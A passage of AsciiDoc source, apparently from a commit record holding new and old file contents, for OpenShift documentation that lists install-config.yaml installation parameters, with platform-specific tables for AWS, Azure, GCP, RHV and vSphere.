configure the Azure SDK with the appropriate Azure API endpoints. If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for control plane machine disk encryption.\n|The encryption key name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For control plane machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For control plane machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For control plane machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nThe GCP Compute Engine System service account used for the encryption request for the given KMS key. The Compute Engine default service account is always used for control plane machines during installation, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. The default service account must have access to the KMS key specified for the control plane machines. The custom service account defined is available for use during post-installation operations. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. Re-add when more stable.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for compute machine disk encryption.\n|The encryption key name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For compute machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For compute machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For compute machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`compute.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nFor compute machines, the GCP Compute Engine System service account used for the encryption request for the given KMS key. If left undefined, the Compute Engine default service account is used, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. Re-add when more stable.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere,vmc[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance with. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.clusterOSImage`\n|The location from which the installer downloads the {op-system} image. You must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with a SHA-256 checksum. For example, `\\https:\/\/mirror.openshift.com\/images\/rhcos-<version>-vmware.<architecture>.ova`.\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. The number of virtual CPUs (vCPUs) on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`\n|Integer\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer\n|====\n\nendif::vsphere,vmc[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:!vsphere:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:vsphere:\nendif::[]\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n[IMPORTANT]\n====\nThe `openshift-install` command does not validate field names for parameters. If an incorrect name is specified, the related file or object is not created, and no error is reported. Ensure that the field names for any parameters that are specified are correct.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer long.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heteregeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\nifndef::openshift-origin[]\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n[NOTE]\n====\nIf you are using Azure File storage, you cannot enable FIPS mode.\n====\n|`false` or `true`\nendif::openshift-origin[]\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the network for the cluster.\n|Object\n\n[NOTE]\n====\nYou cannot modify parameters specified by the `networking` object after installation.\n====\n\n|`networking.networkType`\n|The default Container Network Interface (CNI) network provider plug-in to install.\nifdef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OVNKubernetes`.\nendif::openshift-origin[]\nifndef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OpenShiftSDN`.\nendif::openshift-origin[]\n|String\n\n|`networking.clusterNetwork`\n|The IP address blocks for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`. If you specify multiple IP address blocks, the blocks must not overlap.\n|Array of objects. For example:\n\n[source,yaml]\n----\nnetworking:\n clusterNetwork:\n - cidr: 10.128.0.0\/14\n hostPrefix: 23\n----\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. An IP address block.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.128.0.0\/14`.\n\n|`networking.clusterNetwork.hostPrefix`\n|The subnet prefix length to assign to each individual node. For example, if `hostPrefix` is set to `23`, then each node is assigned a `\/23` subnet out of the given `cidr`, allowing for 510 (2^(32 - 23) - 2) pod IP addresses.\n|A subnet prefix. The default value is `23`.\n\n|`networking.serviceNetwork`\n|The IP address block for services. The default is `172.30.0.0\/16`.\n\nThe OpenShift SDN and OVN-Kubernetes Container Network Interface (CNI) network providers support only a single IP address block for the service network.\n|An IP address block in CIDR format. For example, `172.30.0.0\/16`.\n\n[source,yaml]\n----\nnetworking:\n serviceNetwork:\n - 172.30.0.0\/16\n----\n\n|`networking.machineNetwork`\n|The IP address blocks for machines.\n|Array of objects\n\n[source,yaml]\n----\nnetworking:\n machineNetwork:\n - cidr: 10.0.0.0\/16\n----\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. An IP address block. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.0.0.0\/16`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. The default value is `External`.\n\n|`sshKey`\n| The SSH key or keys to authenticate access your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|One or more keys. For example:\n```\nsshKey:\n key1...\n key2...\n key3...\n```\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the compute machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the control plane machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.hostedZone`\n|An existing Route 53 private hosted zone for the cluster. You can only use a pre-existing hosted zone when also supplying your own VPC. The hosted zone must already be associated with the user-provided VPC before installation. Also, the domain of the hosted zone must be the cluster domain or a parent of the cluster domain. If undefined, the installation program creates a new hosted zone.\n|String, for example `Z3URY6TWQ91KVV`.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} 